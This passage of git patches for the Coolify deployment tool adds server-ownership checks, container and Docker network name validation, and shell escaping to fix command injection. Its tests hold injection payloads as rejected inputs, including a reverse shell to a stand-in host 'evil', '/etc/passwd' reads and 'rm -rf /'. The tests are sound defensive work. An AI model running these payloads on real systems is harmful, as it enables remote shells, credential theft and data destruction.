@@ -54,7 +60,7 @@ class GetLogs extends Component
     public function mount()
     {
         if (! is_null($this->resource)) {
-            if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+            if ($this->resource->getMorphClass() === Application::class) {
                 $this->showTimeStamps = $this->resource->settings->is_include_timestamps;
             } else {
                 if ($this->servicesubtype) {
@@ -63,7 +69,7 @@ public function mount()
                     $this->showTimeStamps = $this->resource->is_include_timestamps;
                 }
             }
-            if ($this->resource?->getMorphClass() === \App\Models\Application::class) {
+            if ($this->resource?->getMorphClass() === Application::class) {
                 if (str($this->container)->contains('-pr-')) {
                     $this->pull_request = 'Pull Request: '.str($this->container)->afterLast('-pr-')->beforeLast('_')->value();
                 }
@@ -74,11 +80,11 @@ public function mount()
     public function instantSave()
     {
         if (! is_null($this->resource)) {
-            if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+            if ($this->resource->getMorphClass() === Application::class) {
                 $this->resource->settings->is_include_timestamps = $this->showTimeStamps;
                 $this->resource->settings->save();
             }
-            if ($this->resource->getMorphClass() === \App\Models\Service::class) {
+            if ($this->resource->getMorphClass() === Service::class) {
                 $serviceName = str($this->container)->beforeLast('-')->value();
                 $subType = $this->resource->applications()->where('name', $serviceName)->first();
                 if ($subType) {
@@ -118,10 +124,20 @@ public function toggleStreamLogs()
 
     public function getLogs($refresh = false)
     {
+        if (! Server::ownedByCurrentTeam()->where('id', $this->server->id)->exists()) {
+            $this->outputs = 'Unauthorized.';
+
+            return;
+        }
         if (! $this->server->isFunctional()) {
             return;
         }
-        if (! $refresh && ! $this->expandByDefault && ($this->resource?->getMorphClass() === \App\Models\Service::class || str($this->container)->contains('-pr-'))) {
+        if ($this->container && ! ValidationPatterns::isValidContainerName($this->container)) {
+            $this->outputs = 'Invalid container name.';
+
+            return;
+        }
+        if (! $refresh && ! $this->expandByDefault && ($this->resource?->getMorphClass() === Service::class || str($this->container)->contains('-pr-'))) {
             return;
         }
         if ($this->numberOfLines <= 0 || is_null($this->numberOfLines)) {
@@ -194,9 +210,15 @@ public function copyLogs(): string
 
     public function downloadAllLogs(): string
     {
+        if (! Server::ownedByCurrentTeam()->where('id', $this->server->id)->exists()) {
+            return '';
+        }
         if (! $this->server->isFunctional() || ! $this->container) {
             return '';
         }
+        if (! ValidationPatterns::isValidContainerName($this->container)) {
+            return '';
+        }
 
         if ($this->showTimeStamps) {
             if ($this->server->isSwarm()) {
diff --git a/tests/Feature/GetLogsCommandInjectionTest.php b/tests/Feature/GetLogsCommandInjectionTest.php
new file mode 100644
index 000000000..34824b48b
--- /dev/null
+++ b/tests/Feature/GetLogsCommandInjectionTest.php
@@ -0,0 +1,110 @@
+<?php
+
+use App\Livewire\Project\Shared\GetLogs;
+use App\Support\ValidationPatterns;
+use Livewire\Attributes\Locked;
+
+describe('GetLogs locked properties', function () {
+    test('container property has Locked attribute', function () {
+        $property = new ReflectionProperty(GetLogs::class, 'container');
+        $attributes = $property->getAttributes(Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('server property has Locked attribute', function () {
+        $property = new ReflectionProperty(GetLogs::class, 'server');
+        $attributes = $property->getAttributes(Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('resource property has Locked attribute', function () {
+        $property = new ReflectionProperty(GetLogs::class, 'resource');
+        $attributes = $property->getAttributes(Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+
+    test('servicesubtype property has Locked attribute', function () {
+        $property = new ReflectionProperty(GetLogs::class, 'servicesubtype');
+        $attributes = $property->getAttributes(Locked::class);
+
+        expect($attributes)->not->toBeEmpty();
+    });
+});
+
+describe('GetLogs container name validation in getLogs', function () {
+    test('getLogs method validates container name with ValidationPatterns', function () {
+        $method = new ReflectionMethod(GetLogs::class, 'getLogs');
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+    });
+
+    test('downloadAllLogs method validates container name with ValidationPatterns', function () {
+        $method = new ReflectionMethod(GetLogs::class, 'downloadAllLogs');
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+    });
+});
+
+describe('GetLogs authorization checks', function () {
+    test('getLogs method checks server ownership via ownedByCurrentTeam', function () {
+        $method = new ReflectionMethod(GetLogs::class, 'getLogs');
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('Server::ownedByCurrentTeam()');
+    });
+
+    test('downloadAllLogs method checks server ownership via ownedByCurrentTeam', function () {
+        $method = new ReflectionMethod(GetLogs::class, 'downloadAllLogs');
+        $startLine = $method->getStartLine();
+        $endLine = $method->getEndLine();
+        $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+        $methodBody = implode('', $lines);
+
+        expect($methodBody)->toContain('Server::ownedByCurrentTeam()');
+    });
+});
+
+describe('GetLogs container name injection payloads are blocked by validation', function () {
+    test('newline injection payload is rejected', function () {
+        // The exact PoC payload from the advisory
+        $payload = "postgresql 2>/dev/null\necho '===RCE-START==='\nid\nwhoami\nhostname\ncat /etc/hostname\necho '===RCE-END==='\n#";
+        expect(ValidationPatterns::isValidContainerName($payload))->toBeFalse();
+    });
+
+    test('semicolon injection payload is rejected', function () {
+        expect(ValidationPatterns::isValidContainerName('postgresql;id'))->toBeFalse();
+    });
+
+    test('backtick injection payload is rejected', function () {
+        expect(ValidationPatterns::isValidContainerName('postgresql`id`'))->toBeFalse();
+    });
+
+    test('command substitution injection payload is rejected', function () {
+        expect(ValidationPatterns::isValidContainerName('postgresql$(whoami)'))->toBeFalse();
+    });
+
+    test('pipe injection payload is rejected', function () {
+        expect(ValidationPatterns::isValidContainerName('postgresql|cat /etc/passwd'))->toBeFalse();
+    });
+
+    test('valid container names are accepted', function () {
+        expect(ValidationPatterns::isValidContainerName('postgresql'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('my-app-container'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('service_db.v2'))->toBeTrue();
+        expect(ValidationPatterns::isValidContainerName('coolify-proxy'))->toBeTrue();
+    });
+});

From 3d1b9f53a0aec74468be75675bcaaaed0fd41d46 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:28:59 +0100
Subject: [PATCH 166/213] fix: add validation and escaping for Docker network
 names

Add strict validation for Docker network names using a regex pattern
that matches Docker's naming rules (alphanumeric start, followed by
alphanumeric, dots, hyphens, underscores).

Changes:
- Add DOCKER_NETWORK_PATTERN to ValidationPatterns with helper methods
- Validate network field in Destination creation and update Livewire components
- Add setNetworkAttribute mutator on StandaloneDocker and SwarmDocker models
- Apply escapeshellarg() to all network field usages in shell commands across
  ApplicationDeploymentJob, DatabaseBackupJob, StartService, Init command,
  proxy helpers, and Destination/Show
- Add comprehensive tests for pattern validation and model mutator

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Actions/Service/StartService.php      |  4 +-
 app/Console/Commands/Init.php             | 11 ++---
 app/Jobs/ApplicationDeploymentJob.php     | 22 ++++++----
 app/Jobs/DatabaseBackupJob.php            |  7 ++--
 app/Livewire/Destination/New/Docker.php   |  3 +-
 app/Livewire/Destination/Show.php         |  7 ++--
 app/Models/StandaloneDocker.php           | 13 +++++-
 app/Models/SwarmDocker.php                | 11 +++++
 app/Support/ValidationPatterns.php        | 45 ++++++++++++++++++++
 bootstrap/helpers/proxy.php               | 24 ++++++-----
 tests/Unit/DockerNetworkInjectionTest.php | 48 ++++++++++++++++++++++
 tests/Unit/ValidationPatternsTest.php     | 50 +++++++++++++++++++++++
 12 files changed, 211 insertions(+), 34 deletions(-)
 create mode 100644 tests/Unit/DockerNetworkInjectionTest.php

diff --git a/app/Actions/Service/StartService.php b/app/Actions/Service/StartService.php
index 6b5e1d4ac..17948d93b 100644
--- a/app/Actions/Service/StartService.php
+++ b/app/Actions/Service/StartService.php
@@ -40,10 +40,10 @@ public function handle(Service $service, bool $pullLatestImages = false, bool $s
         $commands[] = "docker network connect $service->uuid coolify-proxy >/dev/null 2>&1 || true";
         if (data_get($service, 'connect_to_docker_network')) {
             $compose = data_get($service, 'docker_compose', []);
-            $network = $service->destination->network;
+            $safeNetwork = escapeshellarg($service->destination->network);
             $serviceNames = data_get(Yaml::parse($compose), 'services', []);
             foreach ($serviceNames as $serviceName => $serviceConfig) {
-                $commands[] = "docker network connect --alias {$serviceName}-{$service->uuid} $network {$serviceName}-{$service->uuid} >/dev/null 2>&1 || true";
+                $commands[] = "docker network connect --alias {$serviceName}-{$service->uuid} {$safeNetwork} {$serviceName}-{$service->uuid} >/dev/null 2>&1 || true";
             }
         }
 
diff --git a/app/Console/Commands/Init.php b/app/Console/Commands/Init.php
index 66cb77838..e95c29f72 100644
--- a/app/Console/Commands/Init.php
+++ b/app/Console/Commands/Init.php
@@ -212,18 +212,19 @@ private function cleanupUnusedNetworkFromCoolifyProxy()
                 $removeNetworks = $allNetworks->diff($networks);
                 $commands = collect();
                 foreach ($removeNetworks as $network) {
-                    $out = instant_remote_process(["docker network inspect -f json $network | jq '.[].Containers | if . == {} then null else . end'"], $server, false);
+                    $safe = escapeshellarg($network);
+                    $out = instant_remote_process(["docker network inspect -f json {$safe} | jq '.[].Containers | if . == {} then null else . end'"], $server, false);
                     if (empty($out)) {
-                        $commands->push("docker network disconnect $network coolify-proxy >/dev/null 2>&1 || true");
-                        $commands->push("docker network rm $network >/dev/null 2>&1 || true");
+                        $commands->push("docker network disconnect {$safe} coolify-proxy >/dev/null 2>&1 || true");
+                        $commands->push("docker network rm {$safe} >/dev/null 2>&1 || true");
                     } else {
                         $data = collect(json_decode($out, true));
                         if ($data->count() === 1) {
                             // If only coolify-proxy itself is connected to that network (it should not be possible, but who knows)
                             $isCoolifyProxyItself = data_get($data->first(), 'Name') === 'coolify-proxy';
                             if ($isCoolifyProxyItself) {
-                                $commands->push("docker network disconnect $network coolify-proxy >/dev/null 2>&1 || true");
-                                $commands->push("docker network rm $network >/dev/null 2>&1 || true");
+                                $commands->push("docker network disconnect {$safe} coolify-proxy >/dev/null 2>&1 || true");
+                                $commands->push("docker network rm {$safe} >/dev/null 2>&1 || true");
                             }
                         }
                     }
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 785e8c8e3..dc8bc4374 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -288,7 +288,8 @@ public function handle(): void
             // Make sure the private key is stored in the filesystem
             $this->server->privateKey->storeInFileSystem();
             // Generate custom host<->ip mapping
-            $allContainers = instant_remote_process(["docker network inspect {$this->destination->network} -f '{{json .Containers}}' "], $this->server);
+            $safeNetwork = escapeshellarg($this->destination->network);
+            $allContainers = instant_remote_process(["docker network inspect {$safeNetwork} -f '{{json .Containers}}' "], $this->server);
 
             if (! is_null($allContainers)) {
                 $allContainers = format_docker_command_output_to_json($allContainers);
@@ -2015,9 +2016,11 @@ private function prepare_builder_image(bool $firstTry = true)
             $runCommand = "docker run -d --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
         } else {
             if ($this->dockerConfigFileExists === 'OK') {
-                $runCommand = "docker run -d --network {$this->destination->network} --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+                $safeNetwork = escapeshellarg($this->destination->network);
+                $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
             } else {
-                $runCommand = "docker run -d --network {$this->destination->network} --name {$this->deployment_uuid} {$env_flags} --rm -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+                $safeNetwork = escapeshellarg($this->destination->network);
+                $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
             }
         }
         if ($firstTry) {
@@ -3046,28 +3049,29 @@ private function build_image()
                 $this->execute_remote_command([executeInDocker($this->deployment_uuid, 'rm '.self::NIXPACKS_PLAN_PATH), 'hidden' => true]);
             } else {
                 // Dockerfile buildpack
+                $safeNetwork = escapeshellarg($this->destination->network);
                 if ($this->dockerSecretsSupported) {
                     // Modify the Dockerfile to use build secrets
                     $this->modify_dockerfile_for_secrets("{$this->workdir}{$this->dockerfile_location}");
                     $secrets_flags = $this->build_secrets ? " {$this->build_secrets}" : '';
                     if ($this->force_rebuild) {
-                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
+                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
                     } else {
-                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
+                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
                     }
                 } elseif ($this->dockerBuildkitSupported) {
                     // BuildKit without secrets
                     if ($this->force_rebuild) {
-                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
+                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
                     } else {
-                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
+                        $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
                     }
                 } else {
                     // Traditional build with args
                     if ($this->force_rebuild) {
-                        $build_command = $this->wrap_build_command_with_env_export("docker build --no-cache {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
+                        $build_command = $this->wrap_build_command_with_env_export("docker build --no-cache {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
                     } else {
-                        $build_command = $this->wrap_build_command_with_env_export("docker build {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
+                        $build_command = $this->wrap_build_command_with_env_export("docker build {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
                     }
                 }
                 $base64_build_command = base64_encode($build_command);
diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index 7f1feaa21..a2d08e1e8 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -678,6 +678,7 @@ private function upload_to_s3(): void
             } else {
                 $network = $this->database->destination->network;
             }
+            $safeNetwork = escapeshellarg($network);
 
             $fullImageName = $this->getFullImageName();
 
@@ -689,13 +690,13 @@ private function upload_to_s3(): void
             if (isDev()) {
                 if ($this->database->name === 'coolify-db') {
                     $backup_location_from = '/var/lib/docker/volumes/coolify_dev_backups_data/_data/coolify/coolify-db-'.$this->server->ip.$this->backup_file;
-                    $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
+                    $commands[] = "docker run -d --network {$safeNetwork} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
                 } else {
                     $backup_location_from = '/var/lib/docker/volumes/coolify_dev_backups_data/_data/databases/'.str($this->team->name)->slug().'-'.$this->team->id.'/'.$this->directory_name.$this->backup_file;
-                    $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
+                    $commands[] = "docker run -d --network {$safeNetwork} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
                 }
             } else {
-                $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $this->backup_location:$this->backup_location:ro {$fullImageName}";
+                $commands[] = "docker run -d --network {$safeNetwork} --name backup-of-{$this->backup_log_uuid} --rm -v $this->backup_location:$this->backup_location:ro {$fullImageName}";
             }
 
             // Escape S3 credentials to prevent command injection
diff --git a/app/Livewire/Destination/New/Docker.php b/app/Livewire/Destination/New/Docker.php
index 70751fa03..5c1b178d7 100644
--- a/app/Livewire/Destination/New/Docker.php
+++ b/app/Livewire/Destination/New/Docker.php
@@ -5,6 +5,7 @@
 use App\Models\Server;
 use App\Models\StandaloneDocker;
 use App\Models\SwarmDocker;
+use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Locked;
 use Livewire\Attributes\Validate;
@@ -24,7 +25,7 @@ class Docker extends Component
     #[Validate(['required', 'string'])]
     public string $name;
 
-    #[Validate(['required', 'string'])]
+    #[Validate(['required', 'string', 'max:255', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/'])]
     public string $network;
 
     #[Validate(['required', 'string'])]
diff --git a/app/Livewire/Destination/Show.php b/app/Livewire/Destination/Show.php
index 98cf72376..f2cdad074 100644
--- a/app/Livewire/Destination/Show.php
+++ b/app/Livewire/Destination/Show.php
@@ -20,7 +20,7 @@ class Show extends Component
     #[Validate(['string', 'required'])]
     public string $name;
 
-    #[Validate(['string', 'required'])]
+    #[Validate(['string', 'required', 'max:255', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/'])]
     public string $network;
 
     #[Validate(['string', 'required'])]
@@ -84,8 +84,9 @@ public function delete()
                 if ($this->destination->attachedTo()) {
                     return $this->dispatch('error', 'You must delete all resources before deleting this destination.');
                 }
-                instant_remote_process(["docker network disconnect {$this->destination->network} coolify-proxy"], $this->destination->server, throwError: false);
-                instant_remote_process(['docker network rm -f '.$this->destination->network], $this->destination->server);
+                $safeNetwork = escapeshellarg($this->destination->network);
+                instant_remote_process(["docker network disconnect {$safeNetwork} coolify-proxy"], $this->destination->server, throwError: false);
+                instant_remote_process(["docker network rm -f {$safeNetwork}"], $this->destination->server);
             }
             $this->destination->delete();
 
diff --git a/app/Models/StandaloneDocker.php b/app/Models/StandaloneDocker.php
index 0407c2255..abd6e168f 100644
--- a/app/Models/StandaloneDocker.php
+++ b/app/Models/StandaloneDocker.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Jobs\ConnectProxyToNetworksJob;
+use App\Support\ValidationPatterns;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
 
@@ -18,13 +19,23 @@ protected static function boot()
         parent::boot();
         static::created(function ($newStandaloneDocker) {
             $server = $newStandaloneDocker->server;
+            $safeNetwork = escapeshellarg($newStandaloneDocker->network);
             instant_remote_process([
-                "docker network inspect $newStandaloneDocker->network >/dev/null 2>&1 || docker network create --driver overlay --attachable $newStandaloneDocker->network >/dev/null",
+                "docker network inspect {$safeNetwork} >/dev/null 2>&1 || docker network create --driver overlay --attachable {$safeNetwork} >/dev/null",
             ], $server, false);
             ConnectProxyToNetworksJob::dispatchSync($server);
         });
     }
 
+    public function setNetworkAttribute(string $value): void
+    {
+        if (! ValidationPatterns::isValidDockerNetwork($value)) {
+            throw new \InvalidArgumentException('Invalid Docker network name. Must start with alphanumeric and contain only alphanumeric characters, dots, hyphens, and underscores.');
+        }
+
+        $this->attributes['network'] = $value;
+    }
+
     public function applications()
     {
         return $this->morphMany(Application::class, 'destination');
diff --git a/app/Models/SwarmDocker.php b/app/Models/SwarmDocker.php
index 08be81970..3144432c5 100644
--- a/app/Models/SwarmDocker.php
+++ b/app/Models/SwarmDocker.php
@@ -2,10 +2,21 @@
 
 namespace App\Models;
 
+use App\Support\ValidationPatterns;
+
 class SwarmDocker extends BaseModel
 {
     protected $guarded = [];
 
+    public function setNetworkAttribute(string $value): void
+    {
+        if (! ValidationPatterns::isValidDockerNetwork($value)) {
+            throw new \InvalidArgumentException('Invalid Docker network name. Must start with alphanumeric and contain only alphanumeric characters, dots, hyphens, and underscores.');
+        }
+
+        $this->attributes['network'] = $value;
+    }
+
     public function applications()
     {
         return $this->morphMany(Application::class, 'destination');
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 7084b4cc2..cec607f4e 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -58,6 +58,13 @@ class ValidationPatterns
      */
     public const CONTAINER_NAME_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
 
+    /**
+     * Pattern for Docker network names
+     * Must start with alphanumeric, followed by alphanumeric, dots, hyphens, or underscores
+     * Matches Docker's network naming rules and prevents shell injection
+     */
+    public const DOCKER_NETWORK_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
+
     /**
      * Get validation rules for name fields
      */
@@ -210,6 +217,44 @@ public static function isValidContainerName(string $name): bool
         return preg_match(self::CONTAINER_NAME_PATTERN, $name) === 1;
     }
 
+    /**
+     * Get validation rules for Docker network name fields
+     */
+    public static function dockerNetworkRules(bool $required = true, int $maxLength = 255): array
+    {
+        $rules = [];
+
+        if ($required) {
+            $rules[] = 'required';
+        } else {
+            $rules[] = 'nullable';
+        }
+
+        $rules[] = 'string';
+        $rules[] = "max:$maxLength";
+        $rules[] = 'regex:'.self::DOCKER_NETWORK_PATTERN;
+
+        return $rules;
+    }
+
+    /**
+     * Get validation messages for Docker network name fields
+     */
+    public static function dockerNetworkMessages(string $field = 'network'): array
+    {
+        return [
+            "{$field}.regex" => 'The network name must start with an alphanumeric character and contain only alphanumeric characters, dots, hyphens, and underscores.',
+        ];
+    }
+
+    /**
+     * Check if a string is a valid Docker network name.
+     */
+    public static function isValidDockerNetwork(string $name): bool
+    {
+        return preg_match(self::DOCKER_NETWORK_PATTERN, $name) === 1;
+    }
+
     /**
      * Get combined validation messages for both name and description fields
      */
diff --git a/bootstrap/helpers/proxy.php b/bootstrap/helpers/proxy.php
index cf9f648bb..ed18dfe76 100644
--- a/bootstrap/helpers/proxy.php
+++ b/bootstrap/helpers/proxy.php
@@ -109,18 +109,20 @@ function connectProxyToNetworks(Server $server)
     ['networks' => $networks] = collectDockerNetworksByServer($server);
     if ($server->isSwarm()) {
         $commands = $networks->map(function ($network) {
+            $safe = escapeshellarg($network);
             return [
-                "docker network ls --format '{{.Name}}' | grep '^$network$' >/dev/null || docker network create --driver overlay --attachable $network >/dev/null",
-                "docker network connect $network coolify-proxy >/dev/null 2>&1 || true",
-                "echo 'Successfully connected coolify-proxy to $network network.'",
+                "docker network ls --format '{{.Name}}' | grep '^{$network}$' >/dev/null || docker network create --driver overlay --attachable {$safe} >/dev/null",
+                "docker network connect {$safe} coolify-proxy >/dev/null 2>&1 || true",
+                "echo 'Successfully connected coolify-proxy to {$safe} network.'",
             ];
         });
     } else {
         $commands = $networks->map(function ($network) {
+            $safe = escapeshellarg($network);
             return [
-                "docker network ls --format '{{.Name}}' | grep '^$network$' >/dev/null || docker network create --attachable $network >/dev/null",
-                "docker network connect $network coolify-proxy >/dev/null 2>&1 || true",
-                "echo 'Successfully connected coolify-proxy to $network network.'",
+                "docker network ls --format '{{.Name}}' | grep '^{$network}$' >/dev/null || docker network create --attachable {$safe} >/dev/null",
+                "docker network connect {$safe} coolify-proxy >/dev/null 2>&1 || true",
+                "echo 'Successfully connected coolify-proxy to {$safe} network.'",
             ];
         });
     }
@@ -141,16 +143,18 @@ function ensureProxyNetworksExist(Server $server)
 
     if ($server->isSwarm()) {
         $commands = $networks->map(function ($network) {
+            $safe = escapeshellarg($network);
             return [
-                "echo 'Ensuring network $network exists...'",
-                "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --driver overlay --attachable $network",
+                "echo 'Ensuring network {$safe} exists...'",
+                "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --driver overlay --attachable {$safe}",
             ];
         });
     } else {
         $commands = $networks->map(function ($network) {
+            $safe = escapeshellarg($network);
             return [
-                "echo 'Ensuring network $network exists...'",
-                "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --attachable $network",
+                "echo 'Ensuring network {$safe} exists...'",
+                "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --attachable {$safe}",
             ];
         });
     }
diff --git a/tests/Unit/DockerNetworkInjectionTest.php b/tests/Unit/DockerNetworkInjectionTest.php
new file mode 100644
index 000000000..b3ca4ac60
--- /dev/null
+++ b/tests/Unit/DockerNetworkInjectionTest.php
@@ -0,0 +1,48 @@
+<?php
+
+use App\Models\StandaloneDocker;
+use App\Models\SwarmDocker;
+
+it('StandaloneDocker rejects network names with shell metacharacters', function (string $network) {
+    $model = new StandaloneDocker;
+    $model->network = $network;
+})->with([
+    'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+    'pipe injection' => 'net|cat /etc/passwd',
+    'dollar injection' => 'net$(whoami)',
+    'backtick injection' => 'net`id`',
+    'space injection' => 'net work',
+])->throws(InvalidArgumentException::class);
+
+it('StandaloneDocker accepts valid network names', function (string $network) {
+    $model = new StandaloneDocker;
+    $model->network = $network;
+
+    expect($model->network)->toBe($network);
+})->with([
+    'simple' => 'mynetwork',
+    'with hyphen' => 'my-network',
+    'with underscore' => 'my_network',
+    'with dot' => 'my.network',
+    'alphanumeric' => 'network123',
+]);
+
+it('SwarmDocker rejects network names with shell metacharacters', function (string $network) {
+    $model = new SwarmDocker;
+    $model->network = $network;
+})->with([
+    'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+    'pipe injection' => 'net|cat /etc/passwd',
+    'dollar injection' => 'net$(whoami)',
+])->throws(InvalidArgumentException::class);
+
+it('SwarmDocker accepts valid network names', function (string $network) {
+    $model = new SwarmDocker;
+    $model->network = $network;
+
+    expect($model->network)->toBe($network);
+})->with([
+    'simple' => 'mynetwork',
+    'with hyphen' => 'my-network',
+    'with underscore' => 'my_network',
+]);
diff --git a/tests/Unit/ValidationPatternsTest.php b/tests/Unit/ValidationPatternsTest.php
index 0da8f9a4d..9ecffe46d 100644
--- a/tests/Unit/ValidationPatternsTest.php
+++ b/tests/Unit/ValidationPatternsTest.php
@@ -80,3 +80,53 @@
     expect(mb_strlen($name))->toBeGreaterThanOrEqual(3)
         ->and(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(1);
 });
+
+it('accepts valid Docker network names', function (string $network) {
+    expect(ValidationPatterns::isValidDockerNetwork($network))->toBeTrue();
+})->with([
+    'simple name' => 'mynetwork',
+    'with hyphen' => 'my-network',
+    'with underscore' => 'my_network',
+    'with dot' => 'my.network',
+    'cuid2 format' => 'ck8s2z1x0000001mhg3f9d0g1',
+    'alphanumeric' => 'network123',
+    'starts with number' => '1network',
+    'complex valid' => 'coolify-proxy.net_2',
+]);
+
+it('rejects Docker network names with shell metacharacters', function (string $network) {
+    expect(ValidationPatterns::isValidDockerNetwork($network))->toBeFalse();
+})->with([
+    'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+    'pipe injection' => 'net|cat /etc/passwd',
+    'dollar injection' => 'net$(whoami)',
+    'backtick injection' => 'net`id`',
+    'ampersand injection' => 'net&rm -rf /',
+    'space' => 'net work',
+    'newline' => "net\nwork",
+    'starts with dot' => '.network',
+    'starts with hyphen' => '-network',
+    'slash' => 'net/work',
+    'backslash' => 'net\\work',
+    'empty string' => '',
+    'single quotes' => "net'work",
+    'double quotes' => 'net"work',
+    'greater than' => 'net>work',
+    'less than' => 'net<work',
+]);
+
+it('generates dockerNetworkRules with correct defaults', function () {
+    $rules = ValidationPatterns::dockerNetworkRules();
+
+    expect($rules)->toContain('required')
+        ->toContain('string')
+        ->toContain('max:255')
